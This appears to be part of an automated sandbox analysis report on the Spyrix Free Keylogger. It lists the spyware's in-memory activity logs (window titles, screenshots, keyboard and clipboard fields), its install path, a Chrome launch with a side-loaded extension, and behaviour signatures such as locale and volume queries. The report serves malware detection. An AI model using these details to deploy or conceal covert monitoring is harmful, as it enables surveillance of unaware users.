Source: spkl.exe, 00000035.00000002.2977775602.00000000065BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: s{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: APP;45567.0081901505;explorer.exe;Program Manager;;user
Source: spkl.exe, 00000035.00000002.2980946676.0000000006C57000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: spkl.exe, 00000035.00000002.2933829318.0000000000A84000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@DOF_PROGMAN
Source: spkl.exe, 00000035.00000002.2971872040.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: :"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}":"31"}
Source: spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984263146.0000000007716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )2024-10-02 00:12:01.027{"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}rSystem";
Source: spkl.exe, 00000035.00000002.2977582430.0000000004FD0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: {"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":[{"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:11:49.129","sEvent":"SCREENSHOT","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:49.973","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","sUser":"user"},{"sTime":"2024-10-02 00:11:56.614","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger 11.6.22","sUser":"user"},{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:11:49.129","sEvent":"SCREENSHOT","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:49.973","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","sUser":"user"},{"sTime":"2024-10-02 00:11:56.614","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger 11.6.22","sUser":"user"},{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},zyzzzzzzzyzzzzz\|zzzzec)"
Source: spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerQd
Source: spkl.exe, 00000035.00000002.2977775602.0000000006520000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.00000000086D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000450A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000035.00000003.2911483610.0000000007717000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:00.152","sdTime":"45567.0083350926","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: i{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}xe;P)
Source: spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [{"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:11:49.129","sEvent":"SCREENSHOT","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:49.973","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","sUser":"user"},{"sTime":"2024-10-02 00:11:56.614","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger 11.6.22","sUser":"user"},{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]t 465)"
Source: spkl.exe, 00000035.00000002.2971872040.0000000004501000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}."Q\|P
Source: spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2912003714.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2904729142.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: G2024-10-02 00:12:00.152{"sTime":"2024-10-02 00:12:00.152","sdTime":"45567.0083350926","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2984263146.0000000007716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:12:01.027{"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SSCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;user?"
Source: spkl.exe, 00000035.00000003.2794463568.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2880916948.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: G2024-10-02 00:11:47.629{"sTime":"2024-10-02 00:11:47.629","sdTime":"45567.0081901505","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0082075116;explorer.exe;Program Manager;ID(
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: USCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000035.00000002.2971872040.000000000455D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}zationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\\Windows\\crx --single-argument https://dashboard.spyrix.com/";
Source: spkl.exe, 00000035.00000002.2977775602.0000000006520000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.00000000086D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000450A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000035.00000003.2779605523.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:47.629","sdTime":"45567.0081901505","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2971872040.0000000004501000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}."
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2974675344.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: explorer.exe;Program Manager
Source: spkl.exe, 00000035.00000002.2980946676.0000000006C57000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager02 00:12:01.02
Source: spkl.exe, 00000035.00000002.2984263146.0000000007716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )2024-10-02 00:12:01.027{"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}Q
Source: spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerP#
Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0082075116;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000035.00000002.2984780387.0000000007D8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:00.1520""
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;user
Source: spkl.exe, 00000035.00000003.2779605523.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:47.629","sdTime":"45567.0081901505","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}00L#
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SSCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;userd"P
Source: spkl.exe, 00000035.00000002.2977775602.00000000065BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: s{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}

Contains functionality to query CPU information (cpuid)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00ECEE90 cpuid

67_2_00ECEE90

Contains functionality to query locales information (e.g. system language)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	53_2_0040AD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	53_2_0040A298
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	53_2_033C4CB8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	53_2_033C4D8A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetLocaleInfoA,	53_2_033C9C9C

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
